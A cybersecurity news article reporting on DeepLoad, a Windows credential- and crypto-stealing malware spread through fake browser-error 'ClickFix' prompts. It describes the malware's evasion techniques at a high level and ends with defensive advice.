A newly emerging malware strain known as DeepLoad is being actively deployed in real-world attacks, targeting Windows users with advanced techniques designed to steal credentials and cryptocurrency assets. First identified in early February on a dark web cybercrime forum, DeepLoad was advertised as a centralized platform capable of delivering multiple types of malware. Researchers at ZeroFox initially observed its promotion as a tool for credential theft, fake wallet replacement, and malicious browser extensions making it particularly attractive within cybercrime-as-a-service (CaaS) ecosystems.

Cybersecurity firm ReliaQuest has now identified the first in-the-wild campaign distributing DeepLoad. The attack leverages the increasingly popular ClickFix technique, which tricks users into executing malicious commands themselves. Victims are presented with fake browser error messages instructing them to paste a command into the Windows Run dialog or terminal to “fix” an issue. Instead, the command launches a persistent PowerShell loader that installs DeepLoad on the system.

The malware dynamically creates a secondary payload as a DLL in the Temp directory, using randomized filenames to evade detection. It disables PowerShell command history and directly interacts with Windows core functions to bypass common monitoring tools. Additionally, it injects itself into the legitimate LockAppHost.exe process via asynchronous procedure call (APC) injection, enabling stealthy, fileless execution within system memory. Because the payload executes in memory without writing decoded files to disk, traditional security tools may fail to detect the intrusion.

DeepLoad is designed to begin stealing sensitive information immediately upon infection. It deploys a standalone credential stealer alongside the main loader, while separating data exfiltration from command-and-control communications to further evade detection.

Additionally, the malware installs a rogue browser extension capable of monitoring nearly all user activity, including:

Ad Banner
  • Active login sessions
  • Open browser tabs
  • Session tokens
  • Saved passwords

This level of access puts both personal and enterprise data at significant risk.

ReliaQuest also observed instances of DeepLoad spreading via USB drives, although it remains unclear whether this capability is built into the malware itself or deployed by its operators as part of the attack chain.

DeepLoad’s architecture and capabilities indicate it was purpose-built for large-scale cybercriminal operations, particularly those targeting cryptocurrency theft. Its combination of social engineering, fileless execution, and modular payload delivery highlights the evolving sophistication of modern malware. Security experts warn that organizations and individuals must remain vigilant against social engineering tactics like ClickFix, avoid executing unknown commands, and implement robust endpoint monitoring to detect unusual system behavior. As DeepLoad campaigns continue to evolve, it represents a significant addition to the growing landscape of stealthy, AI-era cyber threats designed for speed, scale, and financial gain.

Recommended Cyber Technology News :

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com 



🔒 Login or Register to continue reading